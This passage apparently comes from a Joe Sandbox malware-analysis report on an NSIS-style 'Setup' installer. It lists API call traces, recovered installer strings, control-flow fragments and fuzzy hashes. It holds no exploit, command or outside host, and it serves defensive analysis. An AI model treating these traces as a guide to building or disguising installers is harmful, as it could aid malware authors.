                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: AllocatedPerceivedCombinesDutch$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%$P1B$X1C$X1C

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                • String ID: AllocatedPerceivedCombinesDutch$Exch: stack < %d elements$Pop: stack empty

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • <RM>, xrefs: 00402713
                                                                                                                                                                                                                                                                • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                                                                                • AllocatedPerceivedCombinesDutch, xrefs: 00402770
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: <RM>$AllocatedPerceivedCombinesDutch$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-361201530

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 939 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 950 402223-4030f2 call 4062a3 939->950 951 40220d-40221b call 4062a3 939->951 951->950
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 959 405e7f-405e8b 960 405e8c-405ec0 GetTickCount GetTempFileNameW 959->960 961 405ec2-405ec4 960->961 962 405ecf-405ed1 960->962 961->960 964 405ec6 961->964 963 405ec9-405ecc 962->963 964->963
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
• Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
• Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
• Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
• Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
• Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
Memory Dump Source
• Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
